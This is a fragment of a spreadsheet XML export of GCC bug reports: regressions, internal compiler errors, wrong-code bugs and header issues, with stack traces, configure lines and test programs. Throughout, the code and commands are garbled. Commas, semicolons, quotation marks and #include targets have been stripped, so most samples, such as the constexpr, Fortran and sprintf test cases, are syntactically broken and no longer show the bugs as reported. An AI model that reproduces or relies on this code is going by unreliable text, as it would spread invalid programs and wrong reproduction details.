	../../trunk/gcc/fortran/trans-io.c:2259
0x71ad25 gfc_trans_transfer(gfc_code*)
	../../trunk/gcc/fortran/trans-io.c:2395
0x6ba7e7 trans_code
	../../trunk/gcc/fortran/trans.c:1853
0x718790 build_dt
	../../trunk/gcc/fortran/trans-io.c:1921
0x6ba807 trans_code
	../../trunk/gcc/fortran/trans.c:1825
0x6e6008 gfc_generate_function_code(gfc_namespace*)
	../../trunk/gcc/fortran/trans-decl.c:5842
0x6778c0 translate_all_program_units
	../../trunk/gcc/fortran/parse.c:5341
0x6778c0 gfc_parse_file()
	../../trunk/gcc/fortran/parse.c:5538
0x6b7675 gfc_be_parse_file
	../../trunk/gcc/fortran/f95-lang.c:228</t>
  </si>
  <si>
    <t>GCC-71896</t>
  </si>
  <si>
    <t>[6/7 Regression] Constexpr function with pointer to member parameter doesn't return constexpr value</t>
  </si>
  <si>
    <t>Created attachment 38913
Preprocessed source that produces this error.
The following code fails to compile in gcc 6.1.0 but compiles successfully in clang:
```
#include 
struct Foo {
  int x
}
constexpr bool compare(int Foo::*t) { return t ==  }
int main(int char **) {
  // GCC will fail here (&amp;Foo::x == 0) is not a constant expression
  constexpr bool b = compare(
  return b ? 0 : 1
}
```
The compiler output is:
constexpr-test.cpp: In function 'int main(int char**)':
constexpr-test.cpp:11:29:   in constexpr expansion of 'compare(&amp;Foo::x)'
constexpr-test.cpp:7:48: error: '(&amp;Foo::x == 0)' is not a constant expression
 constexpr bool compare(int Foo::*t) { return t ==  }
The commands used to compile are:
gcc-6 --std=c++14 --save-temps -Wall -Wextra constexpr-test.cpp -o constexpr-test
clang --std=c++14 --save-temps -Wall -Wextra constexpr-test.cpp -o constexpr-test 
Preprocessed source is attached. 
Output of gcc-6 --version:
Using built-in specs.
COLLECT_GCC=gcc-6
COLLECT_LTO_WRAPPER=/usr/local/Cellar/gcc/6.1.0/libexec/gcc/x86_64-apple-darwin15.5.0/6.1.0/lto-wrapper
Target: x86_64-apple-darwin15.5.0
Configured with: ../configure --build=x86_64-apple-darwin15.5.0 --prefix=/usr/local/Cellar/gcc/6.1.0 --libdir=/usr/local/Cellar/gcc/6.1.0/lib/gcc/6 --enable-languages=cc++objcobj-c++fortran --program-suffix=-6 --with-gmp=/usr/local/opt/gmp --with-mpfr=/usr/local/opt/mpfr --with-mpc=/usr/local/opt/libmpc --with-isl=/usr/local/opt/isl --with-system-zlib --enable-libstdcxx-time=yes --enable-stage1-checking --enable-checking=release --enable-lto --with-build-config=bootstrap-debug --disable-werror --with-pkgversion='Homebrew gcc 6.1.0' --with-bugurl=https://github.com/Homebrew/homebrew/issues --enable-plugin --disable-nls --enable-multilib
Thread model: posix
gcc version 6.1.0 (Homebrew gcc 6.1.0)</t>
  </si>
  <si>
    <t>raphael.kargon</t>
  </si>
  <si>
    <t>GCC-4464</t>
  </si>
  <si>
    <t>cpp removes duplicate entries from include path</t>
  </si>
  <si>
    <t xml:space="preserve">   cpp eliminates duplicate directories from the include path
   That can make #include_next fail for example the line 42 
	#include_next 
   from the file
	/usr/include/g++-v3/bits/std_cwchar.h
Release:
3.0.1
Environment:
System: Linux rhenium 2.4.9 #67 Mon Sep 3 11:10:40 CDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure  : (reconfigured) ../configure  : (reconfigured) ../configure --prefix=/usr : (reconfigured) ../configure  : (reconfigured) ../configure  : (reconfigured) ../configure --enable-shared --enable-threads=posix --prefix=/usr
How-To-Repeat:
    rhenium% cd /tmp
    rhenium% cat foo.cc
    #include 
    rhenium% g++ -c foo.cc
    rhenium% g++ -c -I/usr/include foo.cc
    In file included from /bin/../lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../include/g++-v3/bits/fpos.h:40
		     from /bin/../lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../include/g++-v3/bits/std_iosfwd.h:41
		     from /bin/../lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../include/g++-v3/bits/std_ios.h:39
		     from /bin/../lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../include/g++-v3/bits/std_ostream.h:39
		     from /bin/../lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../include/g++-v3/bits/std_iostream.h:40
		     from /bin/../lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../include/g++-v3/backward/iostream.h:32
		     from foo.cc:1:
    /bin/../lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../include/g++-v3/bits/std_cwchar.h:42:24: wchar.h: No such file or directory
    ... and so on ...</t>
  </si>
  <si>
    <t>GCC-31205</t>
  </si>
  <si>
    <t>aliased operator assignment produces wrong result</t>
  </si>
  <si>
    <t>With a recent gfortran the following compiles but generates the wrong results:
MODULE TT
 TYPE data_type
   INTEGER :: I=2
 END TYPE data_type
 INTERFACE ASSIGNMENT (=)
   MODULE PROCEDURE set
 END INTERFACE
CONTAINS
  PURE SUBROUTINE set(x1x2)
    TYPE(data_type) INTENT(IN) :: x2
    TYPE(data_type) INTENT(OUT) :: x1
    CALL S1(x1x2)
  END SUBROUTINE
  PURE SUBROUTINE S1(x1x2)
    TYPE(data_type) INTENT(IN) :: x2
    TYPE(data_type) INTENT(OUT) :: x1
    x1%i=x2%i
  END SUBROUTINE
END MODULE
USE TT
TYPE(data_type) :: DE
D%I=4
D=D
E%I=4
CALL set(E(E))
IF (D%I.NE.4) CALL ABORT()
IF (4.NE.E%I) CALL ABORT()
END</t>
  </si>
  <si>
    <t>GCC-62125</t>
  </si>
  <si>
    <t>Nested select type not accepted (rejects valid)</t>
  </si>
  <si>
    <t>Hi I see that gfortran does not compile the attached code which
seems fine to me.
$ gfortran -c test.f90 -o test.o 
test.f90:31.21:
       write(**) u%x
                     1
Error: 'x' at (1) is not a member of the 't1' structure
$ gfortran --version           
GNU Fortran (GCC) 4.10.0 20140812 (experimental)
Copyright (C) 2014 Free Software Foundation Inc.
(As a reference ifort accepts this code.)
Here is the code:
module m
 implicit none
 type abstract :: t1
  logical :: l
 end type t1
 type extends(t1) abstract :: t2
  integer :: i
 end type t2
 type extends(t2) abstract :: t3
  real :: x
 end type t3
contains
 subroutine s(u)
  class(t1) intent(in) :: u
   write(**) u%l
   select type(u)
    class is(t2)
     write(**) u%i
     select type(u)
      class is(t3)
       write(**) u%x
     end select
   end select
 end subroutine s
end module m</t>
  </si>
  <si>
    <t>mrestelli</t>
  </si>
  <si>
    <t>GCC-27476</t>
  </si>
  <si>
    <t>ACATS: Ada testsuite Bourne shell compatibility problem on hpux</t>
  </si>
  <si>
    <t>=== acats support ===
Generating support files... done.
Compiling support files... done.
                === acats tests ===
Running chapter a ...
/mnt/gnu/gcc-3.3/gcc/gcc/testsuite/ada/acats/run_all.sh[242]: ==: A test command
 parameter is not valid.
/mnt/gnu/gcc-3.3/gcc/gcc/testsuite/ada/acats/run_all.sh[242]: ==: A test command
 parameter is not valid.
...</t>
  </si>
  <si>
    <t>GCC-2143</t>
  </si>
  <si>
    <t>Cygwin testsuite regressions: -dirafter and system files</t>
  </si>
  <si>
    <t>This report summarises recent discussions on gcc-patches and gcc-bugs concerning a gcc 3.0 pre-release regression from gcc-2.95.2 on cygwin.
The following five testsuite tests pass with gcc-2.95.2 but fail with gcc 3.0.  
The tests that fail are:
  gcc.dg/cpp/19990407-1.c
  gcc.dg/cpp/19990703-1.c
  gcc.dg/cpp/20000625-2.c
  gcc.dg/cpp/strp1.c
  gcc.dg/cpp/strp2.c
Each test gnerates warnings of the form /usr/include/sys/types.h:110: ISO C89 does not support `long long'
The errors occur because /usr/include/sys/types.h is not treated as system header.  To be treated as a system header /usr/include  must be referenced in the specs using -isystem /usr/include but it is referenced using -dirafter /usr/include.
Release:
gcc 3.0 prerelease
Environment:
NT4 SP1 / cygwin</t>
  </si>
  <si>
    <t>GCC-14355</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] ICE in cxx_incomplete_type_diagnostic</t>
  </si>
  <si>
    <t>This came out of PR 14337: this legal piece of code 
------------------ 
template  struct Constraint { typedef int Result } 
template  struct IsInt 
template  struct IsInt { static const bool value = true } 
template  
typename Constraint::value&gt;::Result foo(T) 
template  
void bar() { 
    foo(1) 
} 
template void bar () 
--------------------- 
ICEs mainline and 3.4 but compiles fine with 3.3.4-pre: 
g/x&gt; /home/bangerth/bin/gcc-3.3.4-pre/bin/c++ -c x.cc 
g/x&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c x.cc 
x.cc: In function `void bar() [with  = int]': 
x.cc:14:   instantiated from here 
x.cc:11: internal compiler error: in cxx_incomplete_type_diagnostic at cp/
typeck2.c:273 
Please submit a full bug report 
I presume that the reason it actually gets to the place of the ICE is 
tied to the fact that it doesn't get the thing in PR 14337 right but 
even then it shouldn't ICE. So there are two distinct problems although 
one of the problem may be necessary to trigger the other. 
Giovanni didn't you recently work on incomplete types? Maybe you have an 
idea in this field... 
W.</t>
  </si>
  <si>
    <t>GCC-1962</t>
  </si>
  <si>
    <t>deducing array types</t>
  </si>
  <si>
    <t>The attached produces
nathan@uha:56&gt;./g++ -B ./ current/1960x.C 
current/1960x.C: In function `int main()':
current/1960x.C:15: no matching function for call to `Baz(const int[1])'
rather than deducing T to be `int const'
Release:
cvs 20010213</t>
  </si>
  <si>
    <t>GCC-58421</t>
  </si>
  <si>
    <t>[4.9 regression] FAIL: gcc.c-torture/compile/20051216-1.c  -O3 -fomit-frame-pointer  (internal compiler error)</t>
  </si>
  <si>
    <t>Broken by r202525.
$ gcc/xgcc -Bgcc/ -fno-diagnostics-show-caret -fdiagnostics-color=never -O3 -fomit-frame-pointer -w -c -o 20051216-1.o ../gcc/testsuite/gcc.c-torture/compile/20051216-1.c
../gcc/testsuite/gcc.c-torture/compile/20051216-1.c: In function â€˜testâ€™:
../gcc/testsuite/gcc.c-torture/compile/20051216-1.c:131:1: internal compiler error: in add_insn_before_nobb at emit-rtl.c:3836
0x40000000004ad1df add_insn_before_nobb
        ../../gcc/emit-rtl.c:3836
0x40000000004b886f add_insn_before(rtx_def* rtx_def* basic_block_def*)
        ../../gcc/emit-rtl.c:3898
0x40000000004b8b1f emit_pattern_before_noloc
        ../../gcc/emit-rtl.c:4179
0x40000000004b8c5f emit_pattern_before_setloc
        ../../gcc/emit-rtl.c:4586
0x4000000000952cff get_nop_from_pool(rtx_def*)
        ../../gcc/sel-sched-ir.c:1048
0x4000000000972ddf prepare_place_to_insert
        ../../gcc/sel-sched.c:5263
0x4000000000972ddf schedule_expr_on_boundary
        ../../gcc/sel-sched.c:5503
0x400000000097710f fill_insns
        ../../gcc/sel-sched.c:5646
0x400000000097710f schedule_on_fences
        ../../gcc/sel-sched.c:7423
0x400000000097710f sel_sched_region_2
        ../../gcc/sel-sched.c:7557
0x400000000097f64f sel_sched_region_1
        ../../gcc/sel-sched.c:7670
0x400000000097f64f sel_sched_region(int)
        ../../gcc/sel-sched.c:7697
0x40000000009810ef run_selective_scheduling()
        ../../gcc/sel-sched.c:7773
0x4000000000e70d2f ia64_reorg
        ../../gcc/config/ia64/ia64.c:9723
0x400000000090610f rest_of_handle_machine_reorg
        ../../gcc/reorg.c:3920
0x400000000090610f execute
        ../../gcc/reorg.c:3950</t>
  </si>
  <si>
    <t>GCC-41511</t>
  </si>
  <si>
    <t>[4.5 Regression] combine behaves differently with/without -g</t>
  </si>
  <si>
    <t>This may be a generic problem though it's found on SH.
sh4-unknown-linux-gnu fails to bootstrap for a while with:
Comparing stages 2 and 3
warning: gcc/cc1-checksum.o differs
Bootstrap comparison failure!
gcc/cfgexpand.o differs
gcc/omp-low.o differs
The stage2 cfgexpand.o is compiled with -g -O2 -gtoggle and
the stage3 one is compiled with -g -O2.  I've confirmed that
even the cross compiler gives the different results with/without
-g at -O2 for cfgexpand.</t>
  </si>
  <si>
    <t>GCC-78326</t>
  </si>
  <si>
    <t>incorrect c++ usage in experimental/vector and others? _X_max_align is inaccessible</t>
  </si>
  <si>
    <t>Hello I work for Intel on the Intel c++ compiler and our compiler uses the g++ headers when we are compiling on Linux host.  When we compile the experimental/vector file we are finding a programming problem.  We've also compiled this construct using the Microsoft visual studio compiler and the clang compiler those compilers likewise are not able to process this construct.
Here's what our compiler reports:
include/c++/6.2.0/experimental/memory_resource(284): error #308: member std::experimental::fundamentals_v2::pmr::memory_resource::_S_max_align (declared at line 74) is inaccessible
  					    __alignment : _S_max_align)
  					                  ^
          detected during instantiation of void *std::experimental::fundamentals_v2::pmr::__resource_adaptor_imp::do_allocate(std::size_t={unsigned long} std::size_t={unsigned long}) [with _Alloc=std::allocator] 
Using creduce we created this smaller test case:
icpc -c vecE.cpp -w
vecE.cpp(14): error #308: member C::_S_max_align (declared at line 10) is inaccessible
          size_t __new_size = _S_max_align
                                    ^
          detected during instantiation of void *D&gt;::m_fn1() [with =B::rebind_alloc]
compilation aborted for vecE.cpp (code 2)
-bash-4.2$ cat !$
cat vecE.cpp
typedef int size_t
class A
struct B {
    template  using rebind_alloc = A
}
template  class D
template  using resource_adaptor = D &gt;
class C {
    static constexpr size_t
    _S_max_align = 0
}
template  class D:C {
    virtual void * m_fn1 () {
        size_t __new_size = _S_max_align
    }
}
resource_adaptor  __get_default_resource___r
What do you think is it possible you could correct this? We see the same diagnostic in experimental/unordered_set unordered_map string set regex memory_resource map list forward_list dequeue
Thanks and regards Melanie Blower</t>
  </si>
  <si>
    <t>GCC-16881</t>
  </si>
  <si>
    <t>-O1 -Wunreachable-code incorrect warning</t>
  </si>
  <si>
    <t>int main(void)
{
        int c = 42
        int d = 1
        if(c == 42)
                d=0
        else
                return d
        return d
}
When compiled with -O1 (or higher) and -Wunreachable-code gcc produces a
warning about the d=0 line being unreachable. Possibly this is just a line
number confusion when optimizing as the first return is never executed. The
warning only occurs when the else is a return.
With -O0 or no -O flags this returns no warings at all which also is incorrect
as the first return is never executed.
The compiled version does function correctly.
The incorrect warning is produced on the above code in 2.95 3.2 3.3 and 3.4.
Oddly enough 3.0 does not produce the warning. All versiosn are from debian
unstable updated as of this morning.
gcc-3.4 -v -save-temps -O1 -Wunreachable-code -o unreachable-code1
unreachable-code1.c
Reading specs from /usr/lib/gcc/i486-linux/3.4.1/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--libexecdir=/usr/lib --with-gxx-include-dir=/usr/include/c++/3.4
--enable-shared --with-system-zlib --enable-nls --without-included-gettext
--program-suffix=-3.4 --enable-__cxa_atexit --enable-libstdcxx-allocator=mt
--enable-clocale=gnu --enable-libstdcxx-debug --disable-werror i486-linux
Thread model: posix
gcc version 3.4.1 (Debian 3.4.1-5)
 /usr/lib/gcc/i486-linux/3.4.1/cc1 -E -quiet -v unreachable-code1.c -mtune=i486
-Wunreachable-code -O1 -o unreachable-code1.i
ignoring nonexistent directory
/usr/lib/gcc/i486-linux/3.4.1/../../../../i486-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc/i486-linux/3.4.1/include
 /usr/include
End of search list.
 /usr/lib/gcc/i486-linux/3.4.1/cc1 -fpreprocessed unreachable-code1.i -quiet
-dumpbase unreachable-code1.c -mtune=i486 -auxbase unreachable-code1 -O1
-Wunreachable-code -version -o unreachable-code1.s
GNU C version 3.4.1 (Debian 3.4.1-5) (i486-linux)
        compiled by GNU C version 3.4.1 (Debian 3.4.1-5).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129583
unreachable-code1.c: In function `main':
unreachable-code1.c:7: warning: will never be executed
 as -V -Qy -o unreachable-code1.o unreachable-code1.s
GNU assembler version 2.15 (i386-linux) using BFD version 2.15
 /usr/lib/gcc/i486-linux/3.4.1/collect2 --eh-frame-hdr -m elf_i386
-dynamic-linker /lib/ld-linux.so.2 -o unreachable-code1
/usr/lib/gcc/i486-linux/3.4.1/../../../crt1.o
/usr/lib/gcc/i486-linux/3.4.1/../../../crti.o
/usr/lib/gcc/i486-linux/3.4.1/crtbegin.o -L/usr/lib/gcc/i486-linux/3.4.1
-L/usr/lib/gcc/i486-linux/3.4.1 -L/usr/lib/gcc/i486-linux/3.4.1/../../..
unreachable-code1.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc
--as-needed -lgcc_s --no-as-needed /usr/lib/gcc/i486-linux/3.4.1/crtend.o
/usr/lib/gcc/i486-linux/3.4.1/../../../crtn.o</t>
  </si>
  <si>
    <t>schallee</t>
  </si>
  <si>
    <t>GCC-44626</t>
  </si>
  <si>
    <t>[4.4 regression] ICE in output_operand: invalid expression as operand</t>
  </si>
  <si>
    <t>seen with 4.4 with -O1 -march=armv7-a -mthumb works with 4.3 and 4.5 work around in 4.4 with -O0 -O2 or -O1 -marm
$ gcc-4.4 -fno-strict-aliasing -O1 -g -c afs_vnop_link.i 
/home/packages/tmp/openafs-1.4.12.1+dfsg/src/afs/VNOPS/afs_vnop_link.c: In function 'afs_link':
/home/packages/tmp/openafs-1.4.12.1+dfsg/src/afs/VNOPS/afs_vnop_link.c:164: internal compiler error: output_operand: invalid expression as operand
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-14919</t>
  </si>
  <si>
    <t>[3.3]: DW_AT_comp_dir is missing</t>
  </si>
  <si>
    <t>Gcc 3.3 will not generate DW_AT_comp_dir under certain condition
which makes it harder to debug. Gcc 3.2 and gcc 3.4 are OK.</t>
  </si>
  <si>
    <t>GCC-78608</t>
  </si>
  <si>
    <t>[7 Regression] gimple-ssa-sprintf.c:570:17: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int'</t>
  </si>
  <si>
    <t>Building the Linux kernel with bootstrap-ubsan gcc shows:
gimple-ssa-sprintf.c:570:17: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int'
I will try to come up with a testcase.</t>
  </si>
  <si>
    <t>GCC-2357</t>
  </si>
  <si>
    <t>HashMap does not handle initialCapacity=0 correctly</t>
  </si>
  <si>
    <t>When the initialCapacity of a HashMap is zero then bucket.length will be zero and then you will get a ArithmetichException in the hash() method.
import java.util.HashMap
public class HashMapTest {
    public static void main(String args[]) {
        HashMap map = new HashMap(0)
        map.get(new Object())
    }
}
Exception in thread main java.lang.ArithmeticException: / by zero
   at 0x4016836d: _Jv_ThrowSignal (/usr/local/gcc/lib/libgcj.so.1)
   at 0x40168402: _Jv_ThrowSignal (/usr/local/gcc/lib/libgcj.so.1)
   at 0x401dc840: java.util.HashMap.hash(java.lang.Object) (/usr/local/gcc/lib/libgcj.so.1)
   at 0x401dc0a4: java.util.HashMap.get(java.lang.Object) (/usr/local/gcc/lib/libgcj.so.1)
   at 0x08048a82: HashMapTest.main(java.lang.String[]) (/tmp/HashMapTest.java:6)   at 0x4017f0a5: gnu.gcj.runtime.FirstThread.run() (/usr/local/gcc/lib/libgcj.so.1)
   at 0x40189d92: java.lang.Thread.run_(java.lang.Object) (/usr/local/gcc/lib/libgcj.so.1)
   at 0x402a2e68: _Jv_ThreadSetPriority(_Jv_Thread_t int) (/usr/local/gcc/lib/libgcj.so.1)
   at 0x4045653d: GC_start_routine (/usr/local/gcc/lib/libgcjgc.so.1)
   at 0x4046fc75: pthread_detach (/lib/libpthread.so.0)
   at 0x40559eba: __clone (/lib/libc.so.6)
Release:
gcc version 3.0 20010323 (prerelease)</t>
  </si>
  <si>
    <t>GCC-1649</t>
  </si>
  <si>
    <t>g++ crash a big source</t>
  </si>
  <si>
    <t>gcc crash when compiling this source with an internal compiler error i comment some lines and it works again with apparently no relation with lines commented then it appear again
Release:
2.95.2 19991024
Environment:
Red hat linux 6.2 kernel 2.2.12 on a pentium III 450 with 64 mb of ram glibc 2.1. and bash command is:
gcc -v -save-temps -I /usr/local/fox-0.99.141/include -c -g3 -Wall InterpoladorFuzzyControlador.cpp
How-To-Repeat:
it is very hard to repeat the same bug appears in other sources on the project (the one attached is the smallest i find)</t>
  </si>
  <si>
    <t>j_jose_iglesias_gomez</t>
  </si>
  <si>
    <t>GCC-27789</t>
  </si>
  <si>
    <t>[4.2 Regression] attribute handling fallout from DECL_INITIAL changes</t>
  </si>
  <si>
    <t>This revision to gcc/cp
2006-05-24  Mark Mitchell  
	PR c++/20103
	* decl.c (cp_make_fname_decl): Don't set DECL_INITIAL to
	error_mark_node to indicate an initialization is OK.
	(start_decl): Likewise.  Adjust call to start_decl_1.
	(start_decl_1): Add initialized parameter.  Simplify.
	* except.c (initialize_handler_parm): Adjust call to
	setart_decl_1.
	(expand_start_catch_block): Let cp_finish_decl initialize catch
	parameters.
	* cp-tree.h (start_decl_1): Adjust prototype.
	* pt.c (tsubst_expr): Don't set DECL_INITIAL to error_mark_node.
	(instantiate_decl): Let cp_finish_decl handle initialization.
	* semantics.c (finish_compound_literal): Create a temporary
	variable for the literal.
	* typeck.c (build_unary_op): Remove COMPOUND_LITERAL_P special
	cases.
	* decl2.c (finish_static_data_member_decl): Don't set
	DECL_INITIAL.
	(grokfield): Do not try to initialize functions.
has resulted in 3 new testsuite failures:
FAIL: g++.dg/ext/dllimport4.C  (test for errors line 6)
FAIL: g++.dg/ext/selectany1.C (test for excess errors)
FAIL: g++.dg/ext/selectany2.C (test for excess errors)
The dllimport failure is because handle_dllimport_atribute in tree.c
uses DECL_INITIAL to disallow adding the attribute to the definition
of a variable.
The selectany failures are because ix86_handle_selectany_attribute in
config/i386/winnt.c uses DECL_INITIAL to disallow adding the attribute
to a variable that is _not_ initialized.
For both attributes the test for DECL_INITIAL still work in C testcases.
Danny</t>
  </si>
  <si>
    <t>GCC-79800</t>
  </si>
  <si>
    <t>[7 Regression] wrong snprintf result range with precision in a narrow negative-positive range</t>
  </si>
  <si>
    <t>As mentioned in the patch for bug 79692 (https://gcc.gnu.org/ml/gcc-patches/2017-02/msg01564.html) the return value of a call to snprintf with a floating directive a non-constant floating argument and with precision specified by the asterisk whose argument's range includes both negative and non-negative values (and the upper bound is low) is in the wrong range.
The following test case shows the problem.  A negative precision must be treated as if no precision were specified.  The result of formatting 1.23456789 using %a is 0x1.3c0ca4283de1bp+0 which is 20 bytes.  However the -fprintf-return-value optimization sets the range of the return value to [6 15] causing the test program to print 20 = 20 instead.
$ cat z.c &amp;&amp; gcc -O2 -Wall -Wextra -Wpedantic z.c &amp;&amp; ./a.out 
volatile double x = 1.23456789
void f (int p)
{
  if (p &lt; -1 || 0 &lt; p)
    p = -1
  char d[30]
  int n = __builtin_sprintf (d %.*a p x)
  const char *s = n = 20
  __builtin_printf (%i %s\n%zu: \%s\\n n s __builtin_strlen (d) d)
}
volatile int i
int main ()
{
  volatile int i = -1
  f (i)
}
20 &lt; 20
20: 0x1.3c0ca4283de1bp+0</t>
  </si>
  <si>
    <t>GCC-15665</t>
  </si>
  <si>
    <t>unable to compile file w/ reference to GETARG/IARGC</t>
  </si>
  <si>
    <t>[dtucker@mordy mpe]$ /usr/bin/gfortran-ssa -v
Reading specs from /lib/ssa/gcc/i686-redhat-linux/3.5-tree-ssa/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --
infodir=/usr/share/info --libdir=/lib/ssa --libexecdir=/lib/ssa --host=i686-
redhat-linux --enable-shared --enable-threads=posix --disable-checking --enable-
languages=cc++javaobjcf95 --with-system-zlib --enable-__cxa_atexit --
disable-multilib
Thread model: posix
gcc version 3.5-tree-ssa 20040513 (Fedora Core Rawhide 3.5ssa-snapshot)
[dtucker@mordy mpe]$ uname -a
Linux mordy 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
Pentium III
[dtucker@mordy mpe]$ /usr/bin/gfortran-ssa -c -save-temps farg.f
farg.f: In function `mpir_iargc':
farg.f:3: internal compiler error: in gfc_conv_intrinsic_function at 
fortran/trans-intrinsic.c:2589
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
farg.f:
      integer function mpir_iargc()
      mpir_iargc = IARGC()
      return
      end
c     
      subroutine mpir_getarg( i s )
      integer       i
      character (LEN=*) s
      external getarg
      call GETARG(is)
      return
      end</t>
  </si>
  <si>
    <t>GCC-10271</t>
  </si>
  <si>
    <t>[3.2/3.3/3.4 regression] [HPPA] Floating point args don't get reloaded across function calls at -O2</t>
  </si>
  <si>
    <t>When compiling the bug.c code below with -O2 the floating point argument to the fprintf does not get reloaded for the second fprintf() call so the second call prints junk. At -O1 the arguments (r23/r24) are properly reloaded.
Release:
3.3 20030309 (Debian prerelease) (Debian testing/unstable) [and others]
Environment:
System: Linux gsyprf11.external.hp.com 2.4.20-pa18-UP #1 Sat Jan 4 22:06:52 PST 2
003 parisc64 unknown unknown GNU/Linux
Architecture: parisc64
host: hppa-unknown-linux-gnu
build: hppa-unknown-linux-gnu
target: hppa-unknown-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++f77objcadatreela
ng --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-inc
lude-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --w
ithout-included-gettext --enable-__cxa_atexit --enable-sjlj-exceptions --enable-c
locale=gnu --enable-debug --enable-objc-gc hppa-linux
How-To-Repeat:
Compile with gcc -O2 -o bug bug.c -lm
$ ./bug
nan
1.422968e-309
With -O1
$ ./bug
nan
nan
------8&lt; bug.c 8&lt;--------
#include 
#include 
void doprint(double dval)
{
        fprintf(stdout %e\n dval)
        fprintf(stdout %e\n dval)
}
int main(int argc char **argv)
{
        doprint(log(-8)) /* nan */
        return 0
}</t>
  </si>
  <si>
    <t>GCC-25877</t>
  </si>
  <si>
    <t>[4.2 Regression] team.c:269: warning: implicit declaration of function 'alloca'</t>
  </si>
  <si>
    <t>/mnt/gnu/gcc-3.3/objdir/./gcc/xgcc -B/mnt/gnu/gcc-3.3/objdir/./gcc/ -B/opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/lib/ -isystem /opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/include -isystem /opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/sys-include -DHAVE_CONFIG_H -I.
-I../../../gcc/libgomp -I. -I../../../gcc/libgomp/config/posix -I../../../gcc/libgomp -Wall -pthread -Werror -O2 -g -O2 -MT team.lo -MD -MP -MF .deps/team.Tpo -
c ../../../gcc/libgomp/team.c  -fPIC -DPIC -o .libs/team.o
cc1: warnings being treated as errors
../../../gcc/libgomp/team.c: In function 'gomp_team_start':
../../../gcc/libgomp/team.c:269: warning: implicit declaration of function 'alloca'
../../../gcc/libgomp/team.c:269: warning: incompatible implicit declaration of built-in function 'alloca'
make[4]: *** [team.lo] Error 1
make[4]: Leaving directory `/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/libgomp'</t>
  </si>
  <si>
    <t>GCC-15089</t>
  </si>
  <si>
    <t>local register variable with a specified register is bad</t>
  </si>
  <si>
    <t>In some cases the specified register for a local variable meant to be
used with inline assembly code is not respected.  This breaks code 
relying on this feature to implement non-standard calling convension.
Provided test case works with all gcc versions tested so far except for all gcc-3.* including current CVS head.</t>
  </si>
  <si>
    <t>nico</t>
  </si>
  <si>
    <t>GCC-3715</t>
  </si>
  <si>
    <t>abort in verify_wide_reg_1</t>
  </si>
  <si>
    <t xml:space="preserve">	verify_wide_reg_1 is aborting because it is called with '(reg/v:SI
	0 %d0 [24])'.
Release:
3.0.1 20010717 (prerelease)
Environment:
System: Linux sykes 2.4.4-SMP #1 SMP Fri Jun 8 09:14:46 GMT 2001 ia64 unknown
Architecture: ia64
host: ia64-unknown-linux-gnu
build: ia64-unknown-linux-gnu
target: m68k-unknown-linux-gnu
configured with: /cvs/branch/gcc/configure --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --disable-shared : (reconfigured) /cvs/branch/gcc/configure --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --disable-shared
How-To-Repeat:
	$ cat xx.i
	extern int *__errno_location (void) __attribute__ ((__const__))
	void *__curbrk = 0
	int
	__brk (void *addr)
	{
	  void *newbrk
	  {
	    register long d0 __asm__ (%d0)
	    asm (move%.l %2 %%d1\n
		 trap #0
		 : =d (d0)
		 : 0 (45) g (addr)
		 : %d0 %d1)
	    newbrk = (void *) d0
	  }
	  __curbrk = newbrk
	  if (newbrk &lt; addr)
	    {
	      (*__errno_location ()) = (12)
	      return -1
	    }
	  return 0
	}
	$ m68k-linux-gcc -c -v xx.i -O2
	Reading specs from /usr/local/m68k-linux/lib/gcc-lib/m68k-linux/3.0.1/specs
	Configured with: /cvs/branch/gcc/configure --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --disable-shared : (reconfigured) /cvs/branch/gcc/configure --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --disable-shared
	Thread model: single
	gcc version 3.0.1 20010717 (prerelease)
	 /usr/local/m68k-linux/lib/gcc-lib/m68k-linux/3.0.1/cc1 -fpreprocessed xx.i -quiet -dumpbase xx.i -O2 -version -o /tmp/cc8vqKzc.s
	GNU CPP version 3.0.1 20010717 (prerelease) (cpplib) (68k GNU/Linux with ELF)
